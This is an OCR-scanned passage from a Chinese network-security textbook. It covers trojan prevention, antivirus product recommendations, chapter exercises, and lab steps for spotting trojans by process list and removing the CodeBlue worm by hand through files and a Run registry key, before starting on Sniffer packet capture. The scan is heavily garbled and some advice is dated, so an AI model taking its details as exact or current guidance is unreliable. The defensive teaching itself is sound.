Script、ActiveX 及 ASP、JSP、CGI 等 都 有 可 能 是 木马 的 滋生 地 。 

(3) 系统 漏洞 : 木马 还 可 以 利用 操作 系统 的 一 些 漏洞 进行 植 入 ， 如 IIS 服务 器 溢出 漏 
洞 ， 通 过 IISHACK 攻击 程序 即 可 使 IS 服务 器 崩溃 ， 并 且 同 时 在 攻击 服务 器 中 执行 远程 森 
马 服 务 器 端 程序 。 

以 上 是 实施 木马 攻击 最 常用 的 三 个 方法 。 对 此 ， 提 出 了 下 面 的 对 应 防范 措施 : 

(1) 慎 防 网 络 资源 ,现在 网 络 上 小 至 木马 程序 , 大 至 盗版 Windows 操作 系统 也 有 下 载 ， 
其 中 来 源 也 各 式 各 样 ， 有 http、ftp、BT 等 等 。 任 何 从 网 上 下 载 回来 的 资源 ， 第 一 步 必 须要 
做 的 便 是 进行 病毒 扫描 。 现 在 大 多 反 病 毒 软件 都 能 清除 木马 ， 只 要 及 时 更 新 病毒 库 ， 安 全 
的 系数 就 可 大 大 提高 。 

(2) 禁用 ActiveX 脚本 。 

(3) 及 时 升级 。 操 作 系统 和 浏览 器 都 存在 不 同 程度 上 的 漏洞 ， 入 侵 者 正 是 利用 这 些 漏 
洞 植 入 森马。 因此， 及 时 更 新 系统 ， 及 时 打 好 补丁 ， 及 时 把 漏洞 补 上 ， 被 入 侵 的 机 会 就 会 
大 大 减少 。 

(4) 启动 网 络 防火 墙 。 防 火 墙 的 作用 在 于 控制 网 络 访问 。 用 户 可 以 设置 耳 规则 和 安全 
级 别 来 防止 非法 连接 。 对 个 人 用 户 来 说 ， 比 较 常 用 的 网 络 防火 墙 有 天 网 防火 墙 和 金山 网 镖 。 


4.5.4 安全 解决 方案 


(1) 目前 瑞星 杀毒 软件 2009 是 国内 最 优秀 的 杀毒 软件 之 一 , 它 功 能 强大 , 病毒 库 更 新 
快 ， 对 国内 病毒 反应 快 、 误 杀 率 低 。 

另外 要 记得 把 瑞星 设置 即时 升级 和 定时 查 杀 ， 如 设 定 某 一 个 时 间 杀 毒 后 ， 瑞 星 将 在 这 
个 时 间 启 动 扫 描 杀 毒 引 擎 ， 进 行 自动 查 杀 ， 如 果 设 定 自动 查 杀 后 关机 ， 则 瑞星 扫描 查 杀 完 
成 后 自动 关机 。 

(2) 安装 360 度 安全 卫士 。 它 是 一 款 国内 最 优秀 的 免费 的 网 络 安全 软件 ， 最 突出 的 功 
能 就 是 查 杀 木 马 和 恶意 软件 ， 在 这 方面 有 时 候 甚 至 超过 了 优秀 的 杀毒 软件 。 另 外 它 还 可 以 
实时 检查 系统 漏洞 并 提示 修复 ， 方 便 快 捷 。 

(3) 下 载 软件 推荐 使 用 迅雷 。 因 为 迅雷 资源 丰富 ， 下 载 速度 快 ， 特 别 是 BT 下 载 。 另 
外 迅雷 和 卡巴 斯 基 联 合 推出 卡巴 斯 基 杀 毒 模块 ， 文 件 下 载 完毕 后 ， 迅 雷 自动 调用 卡巴 斯 基 
杀毒 模块 进行 检查 病毒 。 这 样 可 以 基本 确保 下 载 的 文件 无 病毒 之 虑 。 

(4) 菜鸟 注意 一 般 不 要 安装 防火 墙 。 因 为 安装 后 ， 系 统 运行 每 个 程序 都 要 经 过 防火 墙 
的 认可 ,菜鸟 往往 不 知 所 以 ,认为 是 病毒 就 盲目 地 禁止 运行 ,造成 很 多 程序 不 能 正常 运行 ， 
高 手 就 不 包括 在 内 了 。 

(5) 多 下 载 一 些 病毒 专 杀 工具 ， 以 备 不 时 之 需 。 同 时 注意 新 闻 和 网 络 上 公布 的 病毒 发 
作 日 和 新 病毒 的 信息 ， 并 及 时 升级 病毒 库 或 专 杀 工具 进行 查 杀 ， 没 有 把 握 就 不 要 进行 相关 
操作 。 
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小 结 


本 章 主要 介绍 了 计算 机 病毒 、 木 马 的 相关 知识 ， 通 过 本 章 学 习 ， 学 生 可 掌握 常见 病毒 、 
木马 的 种 类 、 防 范 方法 等 知识 ， 了 解 病毒 、 木 马 的 攻击 原理 。 


本 章 习 题 


一 、 选 择 题 


1 


计算 机 病毒 从 本 质 上 来 说 是 ( 。 )。 

A. 蛋白 质 B. 程序 代码 C. 应 用 程序 
特洛伊 木马 从 本 质 上 来 说 是 ( 。 )。 

A. 黑客 入 侵 计 算 机 的 特殊 工具 

B. 程序 代码 

C. 硬件 设备 

计算 机 病毒 先后 经 历 了 ( ”) 代 的 发 展 。 

A. 一 代 B. 二 代 C. 三 代 
计算 机 病毒 的 主要 传播 途径 有 ( ” )。 

A. 计算 机 不 可 移动 的 硬件 设备 

B. 可 移动 的 储存 设备 

C. 计算 机 网 络 

D. 点 对 点 通信 系统 和 无 线 网 络 

病毒 程序 一 旦 被 激活 ， 就 会 马上 (  )。 

A. 复制 B. 繁殖 C. 消失 
蠕虫 是 由 以 下 ( ”) 部 分 构成 的 。 

A. 传播 模块 B. 隐藏 模块 C. 目的 模块 
蠕虫 入 侵 是 利用 了 主机 的 ( 天 

A. 漏洞 B. 弱点 C. 设备 
木马 入 侵 主机 的 主要 目的 是 为 了 ( % 

A. 维护 系统 B. 窃取 机 密 C. 破坏 系统 


二 、 填 空 题 


麻 太 于 Dc 
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计算 机 病毒 的 特征 为 


D. 四 代 


计算 机 病毒 的 传播 途径 一 般 有 


三 种 。 


文件 型 病毒 将 自己 依附 在 .com 和 .exe 等 文件 上 。 


是 一 种 基于 远程 控制 的 黑客 工具 ， 它 通常 寄生 于 用 户 的 计算 机 系统 


盗窃 用 户 信息 ， 并 通过 网 络 发 送 给 黑客 。 


是 一 种 可 以 自我 复制 的 完全 独立 的 程序 , 它 的 传播 不 需要 借助 被 感染 
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主机 的 其 他 程序 。 它 可 以 自动 创建 与 其 功能 完全 相同 的 副本 ， 并 在 没 人 干涉 的 情况 下 自动 


运行 。 
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、 问 答题 


试 述 计算 机 病毒 的 发 展 阶段 。 

计算 机 病毒 有 哪些 主要 特点 ? 

计算 机 病毒 的 主要 传播 途径 有 哪些 ? 

目前 预防 病毒 工具 中 采用 的 技术 主要 有 哪些 ? 

目前 广泛 使 用 的 计算 机 病毒 检测 技术 有 哪些 ? 

蠕虫 和 病毒 有 哪些 相同 点 和 不 同 点 ? 

如 何 防范 网 络 病毒 ? 

比较 计算 机 病毒 感染 COM 文件 和 EXE 文件 方式 的 异同 点 。 
如 何 进 行 宏 病 毒 的 预防 与 清除 。 

描述 脚本 病毒 的 特点 、 预 防 与 清除 。 

描述 网 络 蠕虫 病毒 传染 与 传播 过 程 。 

逻辑 炸弹 、 后 门 、 病 毒 、 木 马 会 给 用 户 的 计算 机 带 来 哪些 危害 ?如何 尽 量 避 免 遭 


受 程序 攻击 ? 


13: 


为 什么 后 来 的 木马 制造 者 制造 出 反弹 式 木马 ? 反弹 式 木马 的 工作 原理 是 什么 ? 试 


画 出 反弹 式 木马 的 工作 流程 图 。 


14. 
15: 
16. 


试 说 明 逻 辑 炸 弹 与 病毒 有 哪些 相同 点 与 不 同 点 ? 
试 画 出 模拟 Morris 蠕虫 病毒 主体 程序 代码 的 工作 流程 图 。 
利用 计算 机 系统 的 漏洞 是 制作 后 门 的 常用 方法 ， 你 了 解 你 现在 计算 机 的 操作 系统 


的 漏洞 有 哪些 ? 


实 训 一 ” 宏 病 毒 及 网 页 病毒 的 防范 


1. 实验 目的 


(1) 
(2) 
G3) 


掌握 宏 病 毒 的 判断 方法 。 
掌握 宏 病 毒 的 防治 和 清除 。 
掌握 全 面 封杀 网 页 病毒 的 方法 。 


2. 实验 内 容 


(1) 
(2) 
G) 


在 Office 文档 或 Office 系统 中 练习 宏 病 毒 的 判断 方法 。 
体验 宏 病 毒 的 防止 和 清除 。 
练习 全 面 封 杀 网 页 病毒 的 方法 。 


3. 实验 步 


D 


宏 病 毒 的 判断 方法 


虽然 不 是 所 有 包含 宏 的 文档 都 包含 了 宏 病 毒 ， 但 当 有 下 列 情况 之 一 时 ， 你 可 以 百 分 之 
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百 地 断定 Office 文档 或 Office 系统 中 有 宏 病 毒 : 

(1) 在 打开 “ 宏 病 毒 防护 功能 ”的 情况 下 ， 当 你 打开 一 个 你 自己 写 的 文档 时 ， 系 统 会 
会 弹出 相应 的 警告 框 。 而 你 清楚 你 并 没有 在 其 中 使 用 宏 或 并 不 知道 宏 到 底 怎么 用 ， 那 么 你 
可 以 完全 肯定 你 的 文档 已 经 感染 了 宏 病 毒 。 

(2) 同样 是 在 打开 “ 宏 病 毒 防护 功能 ”的 情况 下 ， 你 的 Office 文档 中 一 系列 的 文件 都 
在 打开 时 给 出 宏 警 告 。 由 于 在 一 般 情况 下 我 们 很 少 使 用 到 宏 ， 所 以 当 你 看 到 成 串 的 文 要 有 
宏 警 告 时 ， 可 以 肯定 这 些 文档 中 有 宏 病 毒 。 

(3) 如 果 软 件 中 关于 宏 病 毒 防 护 选 项 启用 后 , 不 能 在 下 次 开机 时 依然 保存 。Word 2003 
中 提供 了 对 宏 病 毒 的 防护 功能 ， 它 可 以 在 “工具 /选项 /常规 ”中 进行 设 定 。 但 有 些 宏 病 毒 为 
了 对 付 Office 2003 中 提供 的 宏 警 告 功能 , 它 在 感染 系统 (这 通常 只 有 在 你 关闭 了 宏 病 毒 防护 
选项 或 者 出 现 宏 警 告 后 ， 你 不 留神 选取 了 “启用 宏 ” 才 有 可 能 ) 后 ， 会 在 每 次 退出 OFFICE 
时 自动 屏蔽 掉 宏 病毒 防护 选项 。 因 此 一 旦 发 现 机 器 中 设置 的 宏 病毒 防护 功能 选项 无 法 在 两 
次 启动 Word 之 间 保 持 有 效 ， 则 系统 一 定 已 经 感染 了 宏 病毒 。 也 就 是 说 一 系列 Word 模板 、 
特别 是 normal.dot 已 经 被 感染 。 

2) ” 宏 病 毒 的 防治 和 清除 

(1) 首选 方法 : 用 最 新 版 的 反 病 毒 软件 清除 宏 病 毒 。 使 用 反 病 毒 软件 是 一 种 高 效 、 安 
全 和 方便 的 清除 方法 ， 也 是 一 般 计算 机 用 户 的 首选 方法 。 对 付 宏 病毒 应 该 和 对 付 其 他 种 类 
的 病毒 一 样 ， 也 要 尽量 使 用 最 新 版 的 查 杀 病毒 软件 。 无 论 使 用 的 是 何 种 反 病毒 软件 ， 及 时 
升级 是 非常 重要 的 。 

(2) 应 急 处 理 方法 : 用 写字 板 或 Word 6.0 文档 作为 清除 宏 病 毒 的 桥梁 。 如 果 你 的 Word 
系统 没有 感染 宏 病 毒 ， 但 需要 打开 某 个 外 来 的 、 己 查 出 感染 有 宏 病 毒 的 文档 ， 而 手头 现 有 
的 反 病 毒 软件 又 无 法 查 杀 它们 ， 那 么 你 可 以 试验 用 下 面 的 方法 来 查 杀 文档 中 的 宏 病 毒打 
开 这 个 包含 了 宏 病 毒 的 文档 (当然 是 启用 Word 中 的 “ 宏 病 毒 防护 ”功能 ， 并 在 宏 警 告 出 现 
时 选择 “取消 宏 ”)， 然 后 在 “文件 ”菜单 中 选择 “另存 为 ”， 将 此 文档 改 存 成 写字 板 (RTF) 
格式 或 Word 6.0 格式 。 

存盘 后 应 该 检查 一 下 文档 的 完整 性 ， 如 果 文 档 内 容 没 有 任何 丢失 ， 并 且 在 重新 打开 此 
文档 时 不 再 出 现 宏 警告 则 大 功 告 成 。 

在 所 有 的 病毒 传播 的 途径 中 ， 利 用 网 页 传播 病毒 的 危害 是 最 大 的 。 稍 不 留神 ， 就 可 能 
中 招 。 其 实 ， 我们 完全 可 以 变 被 动 的 查 杀 为 主动 的 防范 ， 做 到 防 患 于 未 然 。 全 面 封 杀 网 页 
病毒 的 方法 如 下 。 

(1) 屏蔽 指定 网 页 。 

对 于 一 些 包 含 恶意 代码 的 网 页 ， 在 知道 其 地 址 的 情况 下 ， 我 们 可 以 将 其 屏蔽 掉 。 启 动 
下 浏览 器 后 ， 打 开 “ 工 具 ” 菜 单 下 的 “Intermet 选项 ”命令 ， 将 打开 的 窗口 切换 到 “内 容 ” 
选项 卡 ， 在 “分 级 审查 ”中 单 击 “ 启 用 ”按钮 ， 将 打开 的 “内 容 审查 程序 ”窗口 切换 到 “ 许 
可 站 点 ”选项 卡 ， 然 后 在 “允许 该 站 点 ”中 输入 其 地 址 并 单 击 “ 从 不 ”按钮 将 其 添加 到 拒 
绝 列表 中 即 可 。 

(2) 提高 安全 级 别 。 

由 于 网 页 病毒 很 多 都 是 通过 包含 恶意 脚本 来 实现 攻击 的 ， 因 此 我 们 首先 可 以 采取 提高 
正 安全 级 别 的 方法 来 防范 。 


由 EE 


将 前 面 打 开 的 matemet 窗口 切换 到 “安全 ”选项 卡 ， 然 后 单 击 “ 自 定义 级 别 ” 按 钮 打开 
“安全 设置 ”窗口 ， 将 “ActiveX 控件 和 插件 ”、“ 脚 本 ”下 的 所 有 选项 ， 都 尽 可 能 的 设 为 


“禁用 ”， 同 时 将 “ 重 置 自 定义 设置 ” 设 为 “安全 级 -高 ” 即 可 。 
(3) 确保 WSH 安全 。 


很 多 网 页 会 利用 VBScript 编制 病毒 ,它们 利用 Windows 自 带 的 Windows Scripting Host 


激活 运行 。 对 此 ， 我 们 可 以 采取 外 载 系统 自 带 的 WSH 或 将 其 升级 来 防范 这 类 病毒 的 横行 。 


如 果 是 Windows 9X 系统 ， 那 么 只 要 打开 “添加 /删除 程序 ”项 ， 然 后 


通过 修改 Windows 组 


件 ， 把 “附件 ”项 中 的 “Windows Scripting Host” 取 消 即 可 ; 如果 是 Windows 2000/XP 操 


作 更 加 简单 , 只 需要 打开 文件 夹 选项 窗口 ,然后 在 “文件 类 型 ”选项 卡 , 找到 “VBS VBScript 


Script File” 选 项 并 将 其 删除 即 可 。 


另外 我 们 也 可 以 通过 到 微软 网 站 下 载 安装 最 新 的 WSH, 这 样 也 可 以 在 一 定 程度 上 避免 


VBScript 病毒 的 运行 。 
(4) 禁止 远程 注册 表 服 务 。 


通常 情况 下 ， 我 们 是 不 需要 启动 远程 注册 表 服 务 的 ， 因 为 很 多 恶意 网 页 病毒 是 通过 修 


改 注 册 表 来 达到 自己 的 目的 ， 因 此 我 们 可 以 将 该 服务 关闭 。 进 入 控制 面板 ， 在 “管理 工具 ” 
文件 夹 中 打开 “服务 ”项 ， 然 后 双击 右 侧 的 “Remote Registry”， 将 其 启动 类 型 设 为 “已 


禁用 ”， 并 单 击 “ 停 用 ”按钮 即 可 。 
要 预防 网 页 病毒 对 自己 的 侵害 ， 除 了 做 好 上 面 的 保护 工作 之 外 ， 


还 必须 养 成 良好 的 使 


用 习惯 ， 有 条 件 的 应 当 安 装 防火 墙 和 杀毒 软件 ， 这 样 也 可 以 在 一 定 程度 上 阻拦 网 页 脚本 程 


序 的 运行 。 
实 训 二 ”第 四 代 木 马 的 防范 


1. 实验 目的 


我 们 把 目前 的 主流 木马 称 为 第 四 代 木 马 , 随 着 Windows 2000 时 代 的 到 来 , 第 四 代 木 马 
渐渐 暴露 出 很 多 致命 的 缺陷 。 它 的 第 一 个 缺陷 就 是 无 法 掩藏 进程 ， 可 以 通过 掌握 查看 进程 


来 找 出 木马 。 
2. 实验 内 容 
通过 查看 进程 找 出 木马 病毒 。 
3. 实验 步骤 
要 想 通 过 查看 进程 列表 来 发 现 木 马 ， 首 先 必须 知道 哪些 是 系统 过 


FE 程 ， 然 后 才能 发 现 可 


疑 进程 。 如 果 那 台 计 算 机 是 一 台 个 人 使 用 的 计算 机 ， 只 要 保证 每 次 启动 后 在 任务 管理 器 进 


程 列表 ( 按 Ctrl+Shift+Esc) 中 的 进程 为 “最 基本 的 系统 进程 ”+ 安装 的 
杀毒 软件 ， 防 火 墙 等 )。 


自 启动 软件 的 进程 (如 


一 般 个 人 使 用 的 计算 机 有 这 些 进程 就 够 了 ， 如 果 发 现 有 多 余 的 i 


程 ， 你 可 以 通过 服务 


管理 器 找到 相应 的 服务 并 停止 它 来 结束 进程 。 如 果 发 现 多 余 的 进程 并 不 是 系统 服务 ， 那 么 
这 个 进程 很 可 能 就 是 一 个 木马 。 你 可 以 把 这 个 进程 名 记 下 来 ， 这 个 进程 名 在 下 面 的 内 容 中 


© 
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要 用 来 进一步 确定 是 否 是 木马 。 

如 果 那 台电 脑 是 一 台 服 务 器 ， 每 次 启动 后 在 任务 管理 器 进程 列表 ( 按 Ctrl+ShifttEsc) 中 
的 进程 为 “最 基本 的 系统 进程 ”+ 安装 的 自 启 动 软件 的 进程 (如 杀毒 软件 ， 防 火 墙 等 )+ 所 需 
的 服务 。 这 就 要 根据 需求 自己 配置 ， 第 一 次 配置 完 后 记 下 进程 列表 ， 以 后 要 经 常 查看 进程 
列表 ， 发 现 多 余 的 进程 就 把 它 记 下 来 ， 再 根据 下 面 内 容 来 进一步 确定 是 否 是 木马 。 

下 面 是 系统 的 进程 列表 进程 名 ID 描述 最 基本 的 系统 进程 (也 就 是 说 ， 这 些 进程 是 系统 
运行 的 基本 条 件 ， 有 了 这 些 进 程 ， 系 统 就 能 正常 运行 )。 

System Idle Process 0 

System 8 

smss.exe Session Manager 

csrss.exe ” 子 系统 服务 器 进程 

winlogon.exe ”管理 用 户 登录 

services.exe ”包含 很 多 系统 服务 

lsass.exe 管理 卫 安全 策略 以 及 启动 ISAKMP/Oakley (IKE) 和 IP 安全 驱动 程序 。 
(系统 服务 ) 

产生 会 话 密 钥 以 及 授予 用 于 交互 式 客户 / 服 务 器 验证 的 服务 凭据 (tickeb。( 系 统 服务 ) 

svchost.exe 包含 很 多 系统 服务 

svchost.exe 

spoolsv.EXE ”将 文件 加 载 到 内 存 中 以 便 迟 后 打印 。( 系 统 服务 ) 

explorer.exe ”资源 管理 器 

internat.exe ”托盘 区 的 拼音 图 标 

附加 的 系统 进程 (这 些 进程 不 是 必要 的 ， 可 以 根据 需要 通过 服务 管理 器 来 增加 或 减少 ) 

mstask.exe ”允许 程序 在 指定 时 间 运 行 。( 系 统 服 务 ) 

regsvc.exe ”人 允许 远程 注册 表 操 作 。( 系 统 服务 ) 

winmgmt.exe ”提供 系统 管理 信息 (系统 服务 ) 

inetinfo.exe 通过 Intemet 信息 服务 的 管理 单元 提供 FTP 连接 和 管理 。( 系 统 服务 ) 

tlntsvr.exe ”允许 远程 用 户 登 录 到 系统 并 且 使 用 命令 行 运行 控制 台 程 序 。( 系 统 服 务 ) 

允许 通过 Intemet 信息 服务 的 管理 单元 管理 Web 和 FTP 服务 。( 系 统 服务 ) 

tftpd.exe 实现 TFTP Intemet 标准 。 该 标准 不 要 求 用 户 名 和 密码 。 远 程 安装 服务 的 一 
部 分 。( 系 统 服务 ) 

termsrv.exe ”提供 多 会 话 环 境 允 许 客户 端 设备 访问 虚拟 的 Windows 2000 Professional 
桌面 会 话 以 及 运行 在 服务 器 上 的 基于 Windows 的 程序 。( 系 统 服 务 ) 

dns.exe ”应 答对 域名 系统 (DNS) 名 称 的 查询 和 更 新 请 求 。( 系 统 服 务 ) 

以 下 服务 很 少 会 用 到 , 上 面 的 服务 都 对 安全 有 害 , 如 果 不 是 必要 的 应 该 关 掉 tcpsvcs.exe 
提供 在 PXE 可 远程 启动 客户 计算 机 上 远程 安装 Windows 2000 Professional 的 能 力 。 (系统 
服务 ) 

支持 以 下 TCP/IP 服务 : Character Generator, Daytime， Discard， Echo， 以 及 Quote of 
the Day。( 系 统 服务 ) 

ismserv.exe ”人 允许 在 Windows Advanced Server 站 点 间 发 送 和 接收 消息 。( 系 统 服务 ) 


镍 册 | 芜 了 草 。 太 区 帮 洗 索 性 大 马 


ups.exe “管理 连接 到 计算 机 的 不 间断 电源 (UPS)。( 系 统 服务 ) 
wins.exe ”为 注册 和 解析 NetBIOS 型 名 称 的 TCP/IP 客户 提供 NetBIOS 名 称 服务 。( 系 


统 服务 ) 


llssrv.exe License Logging Service( 系 统 服务 ) 

ntfrs.exe 在 多 个 服务 器 间 维 护 文 件 目 录 内 容 的 文件 同步 。( 系 统 服务 ) 

RsSub.exe ”控制 用 来 远程 储存 数据 的 媒体 。( 系 统 服 务 ) 

locator.exe 管理 RPC 名 称 服务 数据 库 。( 系 统 服务 ) 

lserver.exe ”安装 许可 证 服务 器 并 且 在 连接 到 一 台 终 端 服务 器 时 提供 注册 客户 端 许可 


。( 系 统 服务 ) 


dfssvc.exe ”管理 分 布 于 局 域 网 或 广域网 的 逻辑 卷 。( 系 统 服 务 ) 
clipsrv.exe ”支持 “剪贴 簿 查看 器 ”， 以 便 可 以 从 远程 剪贴 簿 查阅 剪贴 页 面 。( 系 统 服务 ) 
msdtc.exe ”并 列 事务 ， 是 分 布 于 两 个 以 上 的 数据 库 ， 消 息 队 列 、 文 件 系 统 ， 或 其 他 事 


务 保护 资源 管理 器 。( 系 统 服务 ) 


faxsvc.exe ”帮助 发 送 和 接收 传真 。( 系 统 服 务 ) 

cisvc.exe ”Indexing Service( 系 统 服务 ) 

dmadmin.exe ”磁盘 管理 请 求 的 系统 管理 服务 。( 系 统 服务 ) 

mnmsrvc.exe “允许 有 权限 的 用 户 使 用 NetMeeting 远程 访问 Windows 桌面 (系统 服务 ) 
netdde.exe ”提供 动态 数据 交换 (CDDE) 的 网 络 传输 和 安全 特性 。( 系 统 服务 ) 
smlogsvc.exe ”配置 性 能 日 志和 警报。( 系 统 服务 ) 

Isvp.exe 为 依赖 质量 服务 (QoS) 的 程序 和 控制 应 用 程序 提供 网 络 信 号 和 本 地 通信 控制 


安装 功能 。( 系 统 服 务 ) 


RsEng.exe ”协调 用 来 储存 不 常用 数据 的 服务 和 管理 工具 。( 系 统 服务 ) 

RsFsa.exe ”管理 远程 储存 的 文件 的 操作 。( 系 统 服务 ) 

grovel.exe ”扫描 零 备 份 存储 (SIS) 卷 上 的 重复 文件 ， 并 且 将 重复 文件 指向 一 个 数据 存储 
以 节省 磁盘 空间 。( 系 统 服 务 ) 
SCardSvr.exe ”对 插入 在 计算 机 智能 卡 阅读 器 中 的 智能 卡 进行 管理 和 访问 控制 。 (系统 服务 ) 
snmp.exe 包含 代理 程序 可 以 监视 网 络 设备 的 活动 并 且 向 网 络 控制 台 工 作 站 汇报 。( 系 


统 服务 ) 


snmptrap.exe ”接收 由 本 地 或 远程 SNMP 代理 程序 产生 的 陷阱 消息 , 然后 将 消息 传递 到 


运行 在 这 台 计 算 机 上 SNMP 管理 程序 。( 系 统 服务 ) 


UtilMan.exe ”从 一 个 窗口 中 启动 和 配置 辅助 工具 。( 系 统 服 务 ) 
msiexec.exe ”依据 .MSI 文件 中 包含 的 命令 来 安装 、 修 复 以 及 删除 软件 。( 系 统 服务 ) 


实 训 三 ”手动 清除 CodeBlue 


1. 实验 目的 


(1) 掌握 感染 CodeBlue 具有 的 特征 。 
(2) 掌握 手动 清除 CodeBlue 的 方法 。 


(it 
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2. 实验 内 容 


(1) 观察 感染 CodeBlue 具有 的 特征 。 
(2) 手动 清除 CodeBlue 的 方法 。 


3. 实验 步骤 


感染 CodeBlue 会 具有 以 下 特征 : 

(1) 打开 资源 管理 器 , 到 C 盘 根 目录 “c:”, 看 一 看 是 否 存在 c:svchost.exe, c:httpext.dll， 
于 这 两 个 文件 带 有 隐藏 属性 ， 因 此 需要 到 资源 浏览 器 的 “工具 ”菜单 中 “文件 夹 选项 ” 
“查看 ”页 ， 将 “显示 所 有 文件 和 文件 夹 ”选项 选中 ， 才 能 确定 。 

(2) 到 开始 菜单 的 “运行 ”项 ， 使 用 regedit.exe 注册 表 编辑 器 ， 到 “HKEY LOCAL 
MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun ”看 一 看 是 否 存在 “Domain 
Manager”。 

(3) 打开 任务 管理 器 ， 到 “查看 ”菜单 中 的 “选择 列 ”， 将 其 中 “线程 计数 ”选项 选 
中 ， 确 定 会 到 “进程 ”页 ， 看 一 看 svchostexe 所 用 的 线程 数 是 否 超 过 100，CodeBlue 的 线 
程 数 一 般 会 是 104，105 左右 。 

(4) 打开 资源 管理 器 ， 到 “C:inetpubscripts” 目 录 ， 看 一 看 是 否 有 httpext.dll。 

通过 以 上 的 特征 ， 可 以 很 方便 识别 CodeBlue 的 存在 ， 由 于 CodeBlue 蠕虫 非常 狐 独 ， 
为 了 降低 大 家 的 警觉 性 , 程序 文件 的 名 字 采 用 了 系统 中 已 经 有 的 文件 svchostexe(C:winntsystem32) 
和 httpext.dll(C:winntsystem32inetsrv)， 如 果 用 户 不 小 心 误 删 除 ， 可 以 到 相同 版 本 的 机 器 上 
复制 相应 文件 ， 或 者 重新 安装 Windows NT/2000， 如 果 是 Windows 2000 以 上 版 本 到 
c:winntsystem32dllcache 下 复制 就 可 以 。 

手动 清除 CodeBlue 的 方法 : 

(1) 请 先 关 掉 IS 服务 ， 避 免 在 此 过 程 中 再 度 受 到 网 上 的 漏洞 攻击 。 

(2) 启动 进程 管理 器 ， 打 开 线 程 浏览 ， 然 后 查看 名 称 为 svchost.exe 的 进程 ， 通 常 系统 
自己 会 有 两 个 ， 而 CodeBlue 的 执行 进程 也 是 这 个 名 字 。 系 统 的 与 CodeBlue 的 进程 最 明显 
的 区 别 在 于 CodeBlue 的 进程 具有 相当 多 的 线程 ,通常 CodeBlue 的 svchost.exe 进程 含有 100 
个 以 上 的 线程 。 

(3) 一 个 一 个 关 掉 这 些 CodeBlue 的 svchost.exe 进程 。 

(4) 删除 C: 目 录 下 的 svchostexe 文件 和 httpext.dll 文件 , 注意 CodeBlue 的 这 两 个 文件 
是 具有 隐 含 、 系 统 属性 的 ， 需 要 打开 查看 所 有 文件 选项 。 

(5) 删除 C:inetpubscripts 目录 下 的 大 小 为 46587 或 者 47099 的 httpext.dll 文件 。 

(6) 打开 注册 表 编 辑 器 ， 找 到 HKEY LOCAL MACHINESoftwareMicrosoftWindows 
CurrentVersionRun， 删 除 其 中 以 Domain Manager 命名 的 键 值 。 


注意 : 为 避免 再 度 被 CodeBlue 感染 ， 建 议 安装 微软 提供 的 Service Pack。 


第 5 章 安全 防护 与 入 侵 检 测 


【本 章 要 点 】 
本 章 主要 从 网 络 安全 的 防护 和 入 侵 检测 入 手 ， 详 细 介绍 了 噢 探 软 件 Sniffer 的 功能 、 对 
报 文 的 捕获 与 解析 及 高 级 应 用 。 在 入 侵 检测 系统 中 ， 介 绍 了 入 侵 检测 系统 的 原理 、 类 型 和 
入 侵 防 护 技术 及 密 锥 系统 。 


5.1 ”Sniffer Pro 网 络 管理 与 监视 


Sniffer 中 文 可 以 翻译 为 嗅 探 器 ， 是 一 种 基于 被 动 侦 听 原理 的 网 络 分 析 方式 。 使 用 这 种 
技术 方式 ， 可 以 监视 网 络 的 状态 、 数 据 流动 情况 以 及 网 络 上 传输 的 信息 。 当 信息 以 明文 的 
形式 在 网 络 上 传输 时 ， 便 可 以 使 用 网 络 监听 的 方式 来 进行 攻击 。 将 网 络 接口 设置 在 监听 模 
式 ， 便 可 以 将 网 上 传输 的 源源 不 断 的 信息 截获 。Sniffer 技术 常常 被 黑客 们 用 来 截获 用 户 的 
口令 。 但 实际 上 Sniffer 技术 被 广泛 地 应 用 于 网 络 故 障 诊断 、 协 议 分 析 、 应 用 性 能 分 析 和 网 
络 安全 保障 等 各 个 领域 。 

Sniffer 分 为 软件 和 硬件 两 种 ,软件 的 Sniffer 有 Sniffer Pro ,Network Monitor、PacketBone 
等 ， 其 优点 是 易于 安装 部 署 ， 易 于 学 习 使 用 ， 同 时 也 易于 交流 ; 缺点 是 无 法 抓 取 网 络 上 所 
有 的 传输 ， 某 些 情况 下 也 就 无 法 真正 了 解 网 络 的 故障 和 运行 情况 。 硬 件 的 Sniffer 通常 称 为 
协议 分 析 仪 ， 一 般 都 是 商业 性 的 ， 价 格 也 比较 昂贵 ， 但 具备 支持 各 类 扩展 的 链 路 捕获 能 
以 及 高 性 能 的 数据 实时 捕获 分 析 的 功能 。 

基于 以 太 网 络 嗅 探 的 Sniffer 只 能 抓 取 一 个 物理 网 段 内 的 包 ， 就 是 说 ， 你 和 监听 的 目标 
中 间 不 能 有 路 由 或 其 他 屏蔽 广播 包 的 设备 ， 这 一 点 很 重要 。 所 以 ， 对 一 般 拨号 上 网 的 用 户 
来 说 ， 是 不 可 能 利用 Sniffer 来 窍 听 到 其 他 人 的 通信 内 容 的 。 

下 面 介绍 一 下 Sniffer 原理 。 

1. 网 络 技术 与 设备 简介 


在 讲述 Sniffer 的 概念 之 前 ， 首 先 需 要 讲述 局 域 网 设备 的 一 些 基 本 概念 。 

数据 在 网 络 上 是 以 很 小 的 称 为 帧 Frame) 的 单位 传输 的 ， 帧 由 几 部 分 组 成 ， 不 同 的 部 分 
执行 不 同 的 功能 。 帧 通过 特定 的 称 为 网 络 驱动 程序 的 软件 进行 成 型 ， 然 后 通过 网 卡 发 送 到 
网 络 上 ， 通 过 网 络 到 达 它 们 的 目的 机 器 ， 在 目的 机 器 的 一 端 执行 相反 的 过 程 。 接 收 端 机 器 
的 以 太 网 卡 捕获 到 这 些 帧 ， 并 告诉 操作 系统 帧 已 到 达 ， 然 后 对 其 进行 存储 。 就 是 在 这 个 传 
输 和 接收 的 过 程 中 ， 嗅 探 器 会 带 来 安全 方面 的 问题 。 

每 一 个 在 局 域 网 (LAN) 上 的 工作 站 都 有 其 硬件 地 址 ， 这 些 地 址 唯一 地 表示 了 网 络 上 的 
机 器 (这 一 点 与 Intemet 地 址 系统 比较 相似 )。 当 用 户 发 送 一 个 数据 包 时 ， 这 些 数据 包 就 会 发 
送 到 LAN 上 所 有 可 用 的 机 器 。 

如 果 使 用 Hub 即 基 于 共享 网 络 的 情况 下 ， 网 络 上 所 有 的 机 器 都 可 以 “ 听 ” 到 通过 的 流 
量 ， 但 对 不 属于 自己 的 数据 包 则 不 予 响应 ( 换 句 话说， 工作 站 A 不 会 捕获 属于 工作 站 B 的 
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数据 ， 而 是 简单 地 忽略 这 些 数据 )。 如 果 某 个 工作 站 的 网 络 接口 处 于 混杂 模式 (关于 混杂 
